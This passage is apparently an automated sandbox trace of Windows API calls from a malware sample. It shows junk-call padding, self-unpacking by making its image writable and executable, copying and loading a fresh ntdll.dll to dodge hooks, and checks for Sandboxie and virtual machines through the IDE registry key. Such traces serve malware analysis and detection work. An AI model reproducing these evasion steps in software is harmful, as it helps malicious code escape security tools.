uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.582] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.583] SetWindowLongA (hWnd=0x0, nIndex=-4, dwNewLong=4207472) returned 0 [0176.583] DestroyWindow (hWnd=0x0) returned 0 [0176.583] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0xfffc4830, lParam=0x35e9481) returned 0x0 [0176.583] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x38412c0 [0176.583] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x38412d0 [0176.583] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x38412f8 [0176.583] GetCursorPos (in: lpPoint=0x18f3d4 | out: lpPoint=0x18f3d4*(x=850, y=824)) returned 1 [0176.583] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="xxx") returned 0x100 [0176.584] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0176.584] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0176.584] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=850, y=824)) returned 1 [0176.584] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0176.584] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0176.587] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0176.587] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0176.587] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0179.580] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0179.580] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0179.580] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=850, y=824)) returned 1 [0179.580] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0179.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11c [0179.582] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0179.582] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0179.582] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0182.576] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0182.576] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0182.576] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=850, y=824)) returned 1 [0182.576] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0182.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0182.578] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0182.579] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0182.579] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0185.571] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0185.571] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0185.571] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=539, y=293)) returned 1 [0185.571] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0185.571] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x128 [0185.573] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0185.573] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0185.573] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0188.566] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0188.566] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0188.566] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=539, y=293)) returned 1 [0188.567] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0188.567] lstrlenA (lpString="") returned 0 [0188.567] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x18f384 | out: psizl=0x18f384) returned 1 [0188.567] GetIconInfo (in: hIcon=0x0, piconinfo=0x0 | out: piconinfo=0x0) returned 0 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.567] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.568] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] IsClipboardFormatAvailable (format=0x1) returned 1 [0188.569] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412f8 | out: hHeap=0x3840000) returned 1 [0188.569] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412d0 | out: hHeap=0x3840000) returned 1 [0188.569] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412c0 | out: hHeap=0x3840000) returned 1 [0188.570] lstrcpyA (in: lpString1=0x18f6c4, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0188.570] lstrlenA (lpString="\x7f") returned 1 [0188.570] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0188.570] lstrcatA (in: lpString1="\x7f", lpString2="\\*" | out: lpString1="\x7f\\*") returned="\x7f\\*" [0188.570] FindFirstFileA (in: lpFileName="\x7f\\*", lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0188.571] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0188.571] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0188.571] lstrcatA (in: lpString1="\x7f", lpString2="\\" | out: lpString1="\x7f\\") returned="\x7f\\" [0188.571] lstrcatA (in: lpString1="\x7f\\", lpString2="" | out: lpString1="\x7f\\") returned="\x7f\\" [0188.571] FindNextFileA (in: hFindFile=0xffffffff, lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0188.571] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0188.571] GetDlgItem (hDlg=0x0, nIDDlgItem=1597437411) returned 0x0 [0188.571] FindWindowA (lpClassName="ConsoleWindowClass", lpWindowName=0x0) returned 0x0 [0188.571] GetDC (hWnd=0x0) returned 0x401085a [0188.572] CreatePen (iStyle=0, cWidth=1, color=0xffffff) returned 0x23300746 [0188.572] CreateSolidBrush (color=0x0) returned 0xe1001f7 [0188.572] SelectObject (hdc=0x401085a, h=0x23300746) returned 0x1b00017 [0188.572] SelectObject (hdc=0x401085a, h=0xe1001f7) returned 0x1900010 [0188.572] Ellipse (hdc=0x401085a, left=-243664, top=56530052, right=-243657, bottom=56530059) returned 1 [0188.572] Ellipse (hdc=0x401085a, left=-243657, top=56530052, right=-243650, bottom=56530059) returned 1 [0188.572] CreateSolidBrush (color=0xff) returned 0x6c1006a9 [0188.572] GetConsoleTitleA (in: lpConsoleTitle=0x18f464, nSize=0x50 | out: lpConsoleTitle="ÈâÔ\x01ÿÿ") returned 0x0 [0188.573] FindWindowA (lpClassName=0x0, lpWindowName="ÈâÔ\x01ÿÿ") returned 0x0 [0188.573] NtdllDefWindowProc_A (hWnd=0x0, Msg=0xfffc4830, wParam=0x5f36f5e3, lParam=0x218d59e0) returned 0x0 [0188.573] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0188.573] SendMessageA (hWnd=0x0, Msg=0x5f36f5e3, wParam=0x1, lParam=0x0) returned 0x0 [0188.573] SendMessageA (hWnd=0x0, Msg=0x5f36f5e3, wParam=0x418390, lParam=0x18f378) returned 0x0 [0188.573] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0188.573] GetClientRect (in: hWnd=0x0, lpRect=0x18f3f4 | out: lpRect=0x18f3f4) returned 0 [0188.573] EnumSystemLanguageGroupsA (lpLanguageGroupEnumProc=0x300000, dwFlags=0x1, lParam=0x0) [0194.398] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0194.399] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0223.474] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x2) returned 1 [0223.475] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.475] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.475] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.475] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.475] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.476] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.476] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.476] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.476] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0223.477] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0223.477] VirtualProtect (in: lpAddress=0x401000, dwSize=0x83d1, flNewProtect=0x40, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0223.479] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="kernel32" | out: DestinationString="kernel32") [0223.479] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x76c20000) returned 0x0 [0223.479] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="user32" | out: DestinationString="user32") [0223.479] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74f40000) returned 0x0 [0223.479] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="advapi32" | out: DestinationString="advapi32") [0223.479] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74d40000) returned 0x0 [0223.479] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="shell32" | out: DestinationString="shell32") [0223.480] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x75fd0000) returned 0x0 [0223.480] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0223.480] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x1d4ea00 [0223.480] GetKeyboardLayoutList (in: nBuff=1, lpList=0x1d4ea00 | out: lpList=0x1d4ea00) returned 1 [0223.481] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18e920 | out: TokenHandle=0x18e920*=0x134) returned 1 [0223.481] GetTokenInformation (in: TokenHandle=0x134, TokenInformationClass=0x19, TokenInformation=0x18e924, TokenInformationLength=0x14, ReturnLength=0x18e91c | out: TokenInformation=0x18e924, ReturnLength=0x18e91c) returned 1 [0223.481] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x18eb60 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0223.481] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0xd5a0f3e9, lpTempFileName=0x18eb60 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 0xf3e9 [0223.482] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 1 [0223.486] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18e958, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0223.486] CopyFileW (lpExistingFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp"), bFailIfExists=0) returned 1 [0223.596] RtlInitUnicodeString (in: DestinationString=0x18e930, SourceString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" | out: DestinationString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp") [0223.596] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp", BaseAddress=0x18e938 | out: BaseAddress=0x18e938*=0x735c0000) returned 0x0 [0223.630] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18eb64, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0223.630] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ed60, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ed60, ResultLength=0x0) returned 0x0 [0223.630] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ed68, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ed68, ReturnLength=0x0) returned 0x0 [0223.630] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0223.630] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1d51678 [0223.630] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0223.630] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0223.630] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, 